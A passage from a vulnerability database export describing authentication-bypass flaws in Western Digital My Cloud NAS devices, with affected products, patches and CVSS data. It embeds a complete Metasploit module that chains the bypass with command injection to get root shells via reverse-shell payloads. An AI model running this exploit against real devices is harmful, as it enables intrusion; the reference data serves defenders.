"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"db": "CNVD",
"id": "CNVD-2022-06496"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-29563",
"trust": 3.7
},
{
"db": "ZDI",
"id": "ZDI-20-1446",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014425",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-12465",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2022-06496",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202012-942",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "NVD",
"id": "CVE-2020-29563"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
]
},
"id": "VAR-202012-0950",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06496"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06496"
}
]
},
"last_update_date": "2023-12-18T13:27:52.785000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "WDC-20010",
"trust": 1.5,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-20010-my-cloud-os5-firmware-5-07-118"
},
{
"title": "Patch for Western Digital My Cloud OS 5 Authorization Issue Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/315866"
},
{
"title": "Western Digital My Cloud Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=137294"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Improper authentication (CWE-287) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "NVD",
"id": "CVE-2020-29563"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.zerodayinitiative.com/advisories/zdi-20-1446/"
},
{
"trust": 2.3,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-20010-my-cloud-os5-firmware-5-07-118"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29563"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "NVD",
"id": "CVE-2020-29563"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"db": "NVD",
"id": "CVE-2020-29563"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-12-15T00:00:00",
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"date": "2021-08-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"date": "2020-12-12T00:15:12.017000",
"db": "NVD",
"id": "CVE-2020-29563"
},
{
"date": "2020-12-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-12-15T00:00:00",
"db": "ZDI",
"id": "ZDI-20-1446"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06496"
},
{
"date": "2021-08-18T08:49:00",
"db": "JVNDB",
"id": "JVNDB-2020-014425"
},
{
"date": "2022-08-06T03:52:42.053000",
"db": "NVD",
"id": "CVE-2020-29563"
},
{
"date": "2022-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western\u00a0Digital\u00a0My\u00a0Cloud\u00a0OS\u00a05\u00a0 Authentication vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014425"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-942"
}
],
"trust": 0.6
}
}
VAR-201809-0306
Vulnerability from variot - Updated: 2023-12-18 13:23It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called "cgi_get_ipv6" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter "flag" with the value "1" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. An attacker can exploit this issue to bypass authentication mechanism and perform unauthorized actions. This may lead to further attacks. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Western Digital MyCloud unauthenticated command injection', 'Description' => %q{ This module exploits authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remote code execution as the root user.
The module first performs a check to see if the target is
WD MyCloud. If so, it attempts to trigger an authentication
bypass (CVE-2018-17153) via a crafted GET request to
/cgi-bin/network_mgr.cgi. If the server responds as expected,
the module assesses the vulnerability status by attempting to
exploit a commend injection vulnerability (CVE-2016-10108) in
order to print a random string via the echo command. This is
done via a crafted POST request to /web/google_analytics.php.
If the server is vulnerable, the same command injection vector
is leveraged to execute the payload.
This module has been successfully tested against Western Digital
MyCloud version 2.30.183.
Note: based on the available disclosures, it seems that the
command injection vector (CVE-2016-10108) might be exploitable
without the authentication bypass (CVE-2018-17153) on versions
before 2.21.126. The obtained results on 2.30.183 imply that
the patch for CVE-2016-10108 did not actually remove the command
injection vector, but only prevented unauthenticated access to it.
},
'License' => MSF_LICENSE,
'Author' => [
'Erik Wynter', # @wyntererik - Metasploit
'Steven Campbell', # CVE-2016-10108 disclosure and PoC
'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC
],
'References' => [
['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.
['CVE', '2018-17153'], # authentication bypass
['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC
['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Platform' => %w[linux unix],
'Arch' => [ ARCH_ARMLE, ARCH_CMD ],
'Targets' => [
[
'Unix In-Memory',
{
'Platform' => [ 'unix', 'linux' ],
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
'Type' => :unix_memory
}
],
[
'Linux Dropper', {
'Arch' => [ARCH_ARMLE],
'Platform' => 'linux',
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
'CMDSTAGER::FLAVOR' => :curl
},
'Type' => :linux_dropper
}
]
],
'CmdStagerFlavor' => ['curl', 'wget'],
'Privileged' => true,
'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),
])
end
def check # sanity check to see if the target is likely WD MyCloud res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) })
return CheckCode::Unknown('Connection failed.') unless res
return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')
print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")
# try the authentication bypass (CVE-2018-17153)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),
'vars_get' => {
'cmd' => 'cgi_get_ipv6',
'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details
}
})
return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res
return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404
# send a command to print a random string via echo. if the target is vulnerable, both the command and the command output will be part of the response body
echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"
print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")
res = execute_command(echo_cmd, { 'wait_for_response' => true })
return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res
return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')
CheckCode::Safe('The target failed to execute the echo command.')
end
def execute_command(cmd, opts = {})
request_hash = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),
'cookie' => 'username=admin',
'vars_post' => {
'cmd' => 'set',
'opt' => 'cloud-device-num',
'arg' => "0|echo #{cmd} #"
}
}
return send_request_cgi(request_hash) if opts['wait_for_response']
# if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response
send_request_cgi(request_hash, 0)
end
def exploit if target.arch.first == ARCH_CMD print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...") execute_command(payload.encoded) else execute_cmdstager(background: true) end end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0306",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud ex2 ultra",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex4",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud pr2100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud pr4100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud wdbctl0020hwt",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex2",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex2100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex4100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud mirror",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud mirror gen 2",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud dl2100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud dl4100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud dl2100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud dl4100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex2 ultra",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex2",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex2100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex4",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex4100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud mirror gen2",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud mirror",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud pr2100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud wdbctl0020hwt",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "digital my cloud wdbctl0020hwt",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "2.30.172"
},
{
"model": "digital my cloud pr4100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud pr2100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud mirror gen",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "20"
},
{
"model": "digital my cloud mirror",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex4100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex4",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex2100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex2 ultra",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex2",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud dl4100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud dl2100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_wdbctl0020hwt:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_pr4100:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_pr2100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_pr2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_mirror_gen_2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_mirror_gen_2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_mirror_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_mirror:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_ex4100:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_ex4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_ex4_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_ex4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_ex2100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_ex2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_ex2_ultra_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_ex2_ultra:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_ex2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_ex2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_dl4100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_dl4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:western_digital:my_cloud_dl2100:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30.196",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:western_digital:my_cloud_dl2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Exploitee.rs, Infosec shop Securify",
"sources": [
{
"db": "BID",
"id": "105359"
}
],
"trust": 0.3
},
"cve": "CVE-2018-17153",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-17153",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-17153",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-17153",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-848",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-17153",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
